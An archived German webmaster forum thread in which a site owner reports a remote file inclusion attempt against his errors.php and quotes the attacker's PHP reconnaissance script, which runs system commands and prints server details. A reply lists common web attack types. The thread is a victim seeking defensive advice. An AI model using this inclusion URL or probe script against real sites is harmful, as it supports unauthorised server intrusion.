Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Brandaktuell: Seite hacken oder Links einschleusen?

Forum rund um das Thema Hardware für Webmaster.
Neues Thema Antworten
euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 13:49

Beitrag von euroexchange.de » 16.09.2009, 00:34

echo "chitoz was here ..<br>";

Gerade fallen mir auf meiner Seite einige seltsame Bewegungen auf.

Eine merkmürdige URL die so nicht auf meiner Seite vorkommt lautet:

EigeneURL.de/errors.php?error=https://www.saskatoonhomepage.ca//components/idggg.txt???

Wobei EigeneURL lediglich beispielhaft ist.

Unter der angehängten URL:

https://www.saskatoonhomepage.ca//components/idggg.txt???

befindet sich ein Skript welches wohl versucht PHP in meine Seite einzuschleusen.

Das Skript sieht so aus:


Jemand eine Idee?

Code: Alles auswählen

<?php
function ConvertBytes&#40;$number&#41;
&#123;
        $len = strlen&#40;$number&#41;;
        if&#40;$len < 4&#41;
        &#123;
                return sprintf&#40;"%d b", $number&#41;;
        &#125;
        if&#40;$len >= 4 && $len <=6&#41;
        &#123;
                return sprintf&#40;"%0.2f Kb", $number/1024&#41;;
        &#125;
        if&#40;$len >= 7 && $len <=9&#41;
        &#123;
                return sprintf&#40;"%0.2f Mb", $number/1024/1024&#41;;
        &#125;
   
        return sprintf&#40;"%0.2f Gb", $number/1024/1024/1024&#41;;
                           
&#125;

echo "chitoz<br>";
$un = @php_uname&#40;&#41;;
$up = system&#40;uptime&#41;;
$id1 = system&#40;id&#41;;
$pwd1 = @getcwd&#40;&#41;;
$sof1 = getenv&#40;"SERVER_SOFTWARE"&#41;;
$php1 = phpversion&#40;&#41;;
$name1 = $_SERVER&#91;'SERVER_NAME'&#93;;
$ip1 = gethostbyname&#40;$SERVER_ADDR&#41;;
$free1= diskfreespace&#40;$pwd1&#41;;
$free = ConvertBytes&#40;diskfreespace&#40;$pwd1&#41;&#41;;
if &#40;!$free&#41; &#123;$free = 0;&#125;
$all1= disk_total_space&#40;$pwd1&#41;;
$all = ConvertBytes&#40;disk_total_space&#40;$pwd1&#41;&#41;;
if &#40;!$all&#41; &#123;$all = 0;&#125;
$used = ConvertBytes&#40;$all1-$free1&#41;;
$os = @PHP_OS;


echo "chitoz was here ..<br>";
echo "uname -a&#58; $un<br>";
echo "os&#58; $os<br>";
echo "uptime&#58; $up<br>";
echo "id&#58; $id1<br>";
echo "pwd&#58; $pwd1<br>";
echo "php&#58; $php1<br>";
echo "software&#58; $sof1<br>";
echo "server-name&#58; $name1<br>";
echo "server-ip&#58; $ip1<br>";
echo "free&#58; $free<br>";
echo "used&#58; $used<br>";
echo "total&#58; $all<br>";
exit;
Zuletzt geändert von euroexchange.de am 16.09.2009, 00:40, insgesamt 1-mal geändert.

Anzeige von ABAKUS

von Anzeige von ABAKUS »


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

mgutt
PostRank 10
PostRank 10
Beiträge: 3206
Registriert: 08.03.2005, 13:13

Beitrag von mgutt » 16.09.2009, 00:40

Das sind Attackscripte. Mit den Daten kann der Hacker dann weiter arbeiten. Aber solche Angriffe bzw. ich nenn es mal "Versuche" sind völlig normal.
Ich kaufe Dein Forum!
Kontaktdaten

euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 13:49

Beitrag von euroexchange.de » 16.09.2009, 00:49

Ist das richtige setzen von Verzeichnis- und Dateirechten sowie das evtl. einbringen einer leeren index.html in jedes Verzeichnis Schutz genug?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


mgutt
PostRank 10
PostRank 10
Beiträge: 3206
Registriert: 08.03.2005, 13:13

Beitrag von mgutt » 16.09.2009, 00:57

Nein. Das Thema Sicherheit ist sehr breit gefächert. Stichworte sind z.B. Angriffe auf den Puffer von PHP, local file inclusion, external file inclusion, register_global attacken in kombination mit include(), XSS, Trojaner auf Deinem Rechner, um Dein FTP-Passwort zu extrahieren (wird immer beliebter) usw. um nur mal die beliebtesten Methoden zu benennen.
Ich kaufe Dein Forum!
Kontaktdaten

euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 13:49

Beitrag von euroexchange.de » 16.09.2009, 01:36

Manchmal frage ich mich wer die wohl alle rausgelassen hat ... :-?

Also machen wir dann auch noch den:

S(Security)
E(Emergency)
O(Officer)

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag